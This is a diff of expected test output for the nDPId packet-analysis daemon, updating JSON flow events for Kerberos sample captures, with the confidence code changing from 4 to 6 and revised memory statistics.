00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":946724453221,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":946724453221,"pkt":"GGbam+N9uKxvNgTjCABFAAA88adAAEAGs7TAqAoMwKgKA6zgAFj7lQiGAAAAAKACchCWGgAAAgQFtAQCCAr\/\/vkhAAAAAAEDAwc="} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":946724453221,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":946724453221,"pkt":"uKxvNgTjGGbam+N9CABFAAA8DbNAAIAGV6nAqAoDwKgKDABYrOCOu9eK+5UIh6ASIAAObgAAAgQFtAEDAwgEAggKM1tACf\/++SE="} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":946724453221,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":946724453221,"pkt":"GGbam+N9uKxvNgTjCABFAAA88adAAEAGs7TAqAoMwKgKA6zgAFj7lQiGAAAAAKACchCWGgAAAgQFtAQCCAr\/\/vkhAAAAAAEDAwc="} 
-00716{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":946724453221,"flow_last_seen":946724453221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1555,"flow_tot_l4_payload_len":1555,"flow_avg_l4_payload_len":222,"midstream":0,"thread_ts_msec":946724453221,"l3_proto":"ip4","src_ip":"192.168.10.12","dst_ip":"192.168.10.3","src_port":44256,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"testbed1.ca","username":""}} -00734{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":35,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":946724453221,"flow_last_seen":946724453222,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1555,"flow_tot_l4_payload_len":4664,"flow_avg_l4_payload_len":424,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"192.168.10.12","dst_ip":"192.168.10.3","src_port":44256,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"testbed1.ca","username":"ubuntu64a"}} 
-00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716066779,"flow_last_seen":946716066779,"flow_idle_time":200000,"flow_min_l4_payload_len":1189,"flow_max_l4_payload_len":1211,"flow_tot_l4_payload_len":2400,"flow_avg_l4_payload_len":1200,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1061,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716067396,"flow_last_seen":946716067396,"flow_idle_time":200000,"flow_min_l4_payload_len":1192,"flow_max_l4_payload_len":1223,"flow_tot_l4_payload_len":2415,"flow_avg_l4_payload_len":1207,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1065,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716067473,"flow_last_seen":946716067513,"flow_idle_time":200000,"flow_min_l4_payload_len":1205,"flow_max_l4_payload_len":1219,"flow_tot_l4_payload_len":2424,"flow_avg_l4_payload_len":1212,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1067,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716067526,"flow_last_seen":946716067526,"flow_idle_time":200000,"flow_min_l4_payload_len":1187,"flow_max_l4_payload_len":1209,"flow_tot_l4_payload_len":2396,"flow_avg_l4_payload_len":1198,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1068,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716067819,"flow_last_seen":946716067819,"flow_idle_time":200000,"flow_min_l4_payload_len":1186,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":2394,"flow_avg_l4_payload_len":1197,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1069,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} 
-00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716089644,"flow_last_seen":946716089644,"flow_idle_time":200000,"flow_min_l4_payload_len":1233,"flow_max_l4_payload_len":1237,"flow_tot_l4_payload_len":2470,"flow_avg_l4_payload_len":1235,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1074,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716089757,"flow_last_seen":946716089757,"flow_idle_time":200000,"flow_min_l4_payload_len":1205,"flow_max_l4_payload_len":1219,"flow_tot_l4_payload_len":2424,"flow_avg_l4_payload_len":1212,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1076,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716138858,"flow_last_seen":946716138858,"flow_idle_time":200000,"flow_min_l4_payload_len":1186,"flow_max_l4_payload_len":1213,"flow_tot_l4_payload_len":2399,"flow_avg_l4_payload_len":1199,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1084,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716139910,"flow_last_seen":946716139910,"flow_idle_time":200000,"flow_min_l4_payload_len":1202,"flow_max_l4_payload_len":1221,"flow_tot_l4_payload_len":2423,"flow_avg_l4_payload_len":1211,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1089,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716140238,"flow_last_seen":946716140238,"flow_idle_time":200000,"flow_min_l4_payload_len":1182,"flow_max_l4_payload_len":1211,"flow_tot_l4_payload_len":2393,"flow_avg_l4_payload_len":1196,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1090,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} 
-00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716140476,"flow_last_seen":946716140476,"flow_idle_time":200000,"flow_min_l4_payload_len":1228,"flow_max_l4_payload_len":1235,"flow_tot_l4_payload_len":2463,"flow_avg_l4_payload_len":1231,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1092,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716140774,"flow_last_seen":946716140774,"flow_idle_time":200000,"flow_min_l4_payload_len":1202,"flow_max_l4_payload_len":1221,"flow_tot_l4_payload_len":2423,"flow_avg_l4_payload_len":1211,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1096,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} -00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946724453221,"flow_last_seen":946724453222,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1555,"flow_tot_l4_payload_len":6218,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"192.168.10.12","dst_ip":"192.168.10.3","src_port":44256,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} +00716{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":946724453221,"flow_last_seen":946724453221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1555,"flow_tot_l4_payload_len":1555,"flow_avg_l4_payload_len":222,"midstream":0,"thread_ts_msec":946724453221,"l3_proto":"ip4","src_ip":"192.168.10.12","dst_ip":"192.168.10.3","src_port":44256,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"testbed1.ca","username":""}} +00734{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":35,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":946724453221,"flow_last_seen":946724453222,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1555,"flow_tot_l4_payload_len":4664,"flow_avg_l4_payload_len":424,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"192.168.10.12","dst_ip":"192.168.10.3","src_port":44256,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"testbed1.ca","username":"ubuntu64a"}} 
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716066779,"flow_last_seen":946716066779,"flow_idle_time":200000,"flow_min_l4_payload_len":1189,"flow_max_l4_payload_len":1211,"flow_tot_l4_payload_len":2400,"flow_avg_l4_payload_len":1200,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1061,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716067396,"flow_last_seen":946716067396,"flow_idle_time":200000,"flow_min_l4_payload_len":1192,"flow_max_l4_payload_len":1223,"flow_tot_l4_payload_len":2415,"flow_avg_l4_payload_len":1207,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1065,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716067473,"flow_last_seen":946716067513,"flow_idle_time":200000,"flow_min_l4_payload_len":1205,"flow_max_l4_payload_len":1219,"flow_tot_l4_payload_len":2424,"flow_avg_l4_payload_len":1212,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1067,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716067526,"flow_last_seen":946716067526,"flow_idle_time":200000,"flow_min_l4_payload_len":1187,"flow_max_l4_payload_len":1209,"flow_tot_l4_payload_len":2396,"flow_avg_l4_payload_len":1198,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1068,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716067819,"flow_last_seen":946716067819,"flow_idle_time":200000,"flow_min_l4_payload_len":1186,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":2394,"flow_avg_l4_payload_len":1197,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1069,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} 
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716089644,"flow_last_seen":946716089644,"flow_idle_time":200000,"flow_min_l4_payload_len":1233,"flow_max_l4_payload_len":1237,"flow_tot_l4_payload_len":2470,"flow_avg_l4_payload_len":1235,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1074,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716089757,"flow_last_seen":946716089757,"flow_idle_time":200000,"flow_min_l4_payload_len":1205,"flow_max_l4_payload_len":1219,"flow_tot_l4_payload_len":2424,"flow_avg_l4_payload_len":1212,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1076,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716138858,"flow_last_seen":946716138858,"flow_idle_time":200000,"flow_min_l4_payload_len":1186,"flow_max_l4_payload_len":1213,"flow_tot_l4_payload_len":2399,"flow_avg_l4_payload_len":1199,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1084,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716139910,"flow_last_seen":946716139910,"flow_idle_time":200000,"flow_min_l4_payload_len":1202,"flow_max_l4_payload_len":1221,"flow_tot_l4_payload_len":2423,"flow_avg_l4_payload_len":1211,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1089,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716140238,"flow_last_seen":946716140238,"flow_idle_time":200000,"flow_min_l4_payload_len":1182,"flow_max_l4_payload_len":1211,"flow_tot_l4_payload_len":2393,"flow_avg_l4_payload_len":1196,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1090,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} 
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716140476,"flow_last_seen":946716140476,"flow_idle_time":200000,"flow_min_l4_payload_len":1228,"flow_max_l4_payload_len":1235,"flow_tot_l4_payload_len":2463,"flow_avg_l4_payload_len":1231,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1092,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716140774,"flow_last_seen":946716140774,"flow_idle_time":200000,"flow_min_l4_payload_len":1202,"flow_max_l4_payload_len":1221,"flow_tot_l4_payload_len":2423,"flow_avg_l4_payload_len":1211,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1096,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} +00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946724453221,"flow_last_seen":946724453222,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1555,"flow_tot_l4_payload_len":6218,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"192.168.10.12","dst_ip":"192.168.10.3","src_port":44256,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} 00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","packets-captured":39,"packets-processed":39,"total-skipped-flows":0,"total-l4-payload-len":35242,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":13,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":13,"total-idle-flows":13,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":71,"global_ts_msec":946724453222} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 39/39 @@ -77,9 +77,9 @@ ~~ total active/idle flows...: 13/13 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5883322 bytes -~~ total memory freed........: 5883322 bytes -~~ total allocations/frees...: 118202/118202 +~~ total memory allocated....: 6016956 bytes +~~ total memory freed........: 6016956 bytes +~~ total allocations/frees...: 120964/120964 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 470 chars ~~ json string max len.......: 2124 chars diff --git a/test/results/kerberos.pcap.out b/test/results/kerberos.pcap.out index 6317b3ab9..a63907b5c 100644 --- a/test/results/kerberos.pcap.out +++ b/test/results/kerberos.pcap.out 
@@ -2,21 +2,20 @@ 00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"kerberos.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1549337929790} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929790,"flow_last_seen":1549337929790,"flow_idle_time":7580000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337929790,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49157,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00774{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1549337929790,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":293,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":293,"pkt_l4_len":259,"thread_ts_msec":1549337929790,"pkt":"pB9ywglqAAgCHEeuCABFAAEXABdAAIAGkNisEAjJrBAICMAFAFiynbRHbznTnlAYAQAf5QAAAAAA62qB6DCB5aEDAgEFogMCAQqjFTATMBGhBAICAICiCQQHMAWgAwEB\/6SBwTCBvqAHAwUAQIEAEKEYMBagAwIBAaEPMA0bC2pvaG5zb24tcGMkohAbDmhhcHB5Y3JhZnQub3JnoyMwIaADAgECoRowGBsGa3JidGd0Gw5oYXBweWNyYWZ0Lm9yZ6URGA8yMDM3MDkxMzAyNDgwNVqmERgPMjAzNzA5MTMwMjQ4MDVapwYCBE7AFheoFTATAgESAgERAgEXAgEYAgL\/eQIBA6kdMBswGaADAgEUoRIEEEpPSE5TT04tUEMgICAgICA="} 
-00721{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929790,"flow_last_seen":1549337929790,"flow_idle_time":7580000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337929790,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49157,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} +00721{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929790,"flow_last_seen":1549337929790,"flow_idle_time":7580000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337929790,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49157,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} 
